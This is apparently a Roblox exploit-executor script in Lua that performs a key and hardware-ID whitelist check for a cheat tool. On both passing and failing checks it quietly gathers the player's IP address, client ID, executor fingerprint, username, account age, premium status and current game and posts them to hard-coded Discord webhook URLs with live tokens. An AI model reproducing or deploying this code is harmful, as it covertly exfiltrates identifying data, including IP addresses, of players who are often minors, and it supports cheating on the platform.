local ClientId = game:GetService("RbxAnalyticsService"):GetClientId()

local Hwid = {
    [1] = "DB1C8A6D-C070-4C22-9F49-6229DE8D55FF",
    ["DB1C8A6D-C070-4C22-9F49-6229DE8D55FF"] = 1,
    [2] = "DB1C8A6D-C070-4C22-9F49-6229DE8D55FF",
    ["DB1C8A6D-C070-4C22-9F49-6229DE8D55FF"] = 2,
}

local Key = {
    [1] = "Owner-QTVPUY",
    [2] = "DB1C8A6D-TZQQYPV"
}



local IP = game:HttpGet("https://v4.ident.me")

plr = game:GetService'Players'.LocalPlayer
local premium = false
local ALT = false
if plr.MembershipType == Enum.MembershipType.Premium then
	premium = true
elseif plr.MembershipType == Enum.MembershipType.None then
	premium = false
end
if premium == false then 
	if plr.AccountAge <= 70 then 
		ALT = true
	end
end

 
local market = game:GetService("MarketplaceService")
local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
 
 
local http_request = http_request;
if syn then
	http_request = syn.request
elseif SENTINEL_V2 then
	function http_request(tb)
		return {
			StatusCode = 200;
			Body = request(tb.Url, tb.Method, (tb.Body or ''))
		}
	end
end
 
local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
hwid = "";
 
for i, v in next, hwid_list do
	if decoded.headers[v] then
		hwid = decoded.headers[v];
		break
	end
end

local KeyNumber = Hwid[ClientId]
if Hwid[KeyNumber] == ClientId then
   if Key[KeyNumber] == key then
       
     
       
      if hwid then
          
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/973293912670240800/5Up08kq3Gg75wHwcQZnCtMeEgqiwWyd5yDVU-AIK6mmGX5OKrpT6V9FT7n7fIyb29CDS"
 
 
local data = 
    {
        ["content"] = "Success Log",
        ["embeds"] = {{
            ["title"] = "__**HWID:**__",
            ["description"] = hwid,
            ["type"] = "rich",
            ["color"] = tonumber(0xAB0909),
            ["fields"] = {
                
                
                 {
                    ["name"] = "ClientId:",
                    ["value"] = ClientId,
                },
                
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
				{
                    ["name"] = "IP Address:",
                    ["value"] = IP,
                    ["inline"] = true
                },
				{
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
				{
					["name"] = "Game Name:",
					["value"] = info.Name,
					["inline"] = true
				},
				{
					["name"] = "Age:",
					["value"] = plr.AccountAge,
					["inline"] = true
				},
			
			
				{
					["name"] = "Premium:",
					["value"] = premium,
					["inline"] = true
				},
 
            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
 
    local headers = {
            ["content-type"] = "application/json"
    }
 
    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
end
       else
           
          
           
            if hwid then
                

       
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/973300809745965076/pKsw6jF9q-jrb1EuHF2upKr6jTaGTvds777KeVZ0rqRTjbXPF_2yD_DG_n0s90_Xi6SK"
 
 
local data = 
    {
        ["content"] = "Failure Log",
        ["embeds"] = {{
            ["title"] = "__**HWID:**__",
            ["description"] = hwid,
            ["type"] = "rich",
            ["color"] = tonumber(0xAB0909),
            ["fields"] = {
                
                
                   {
                    ["name"] = "CLIENT ID :",
                    ["value"] = ClientId,
                },
                
                
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
				{
                    ["name"] = "IP Address:",
                    ["value"] = IP,
                    ["inline"] = true
                },
				{
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
				{
					["name"] = "Game Name:",
					["value"] = info.Name,
					["inline"] = true
				},
				{
					["name"] = "Age:",
					["value"] = plr.AccountAge,
					["inline"] = true
				},
 
 	{
					["name"] = "Premium:",
					["value"] = premium,
					["inline"] = true
				},
 
            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
 
    local headers = {
            ["content-type"] = "application/json"
    }
 
    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
end

       
   end
end
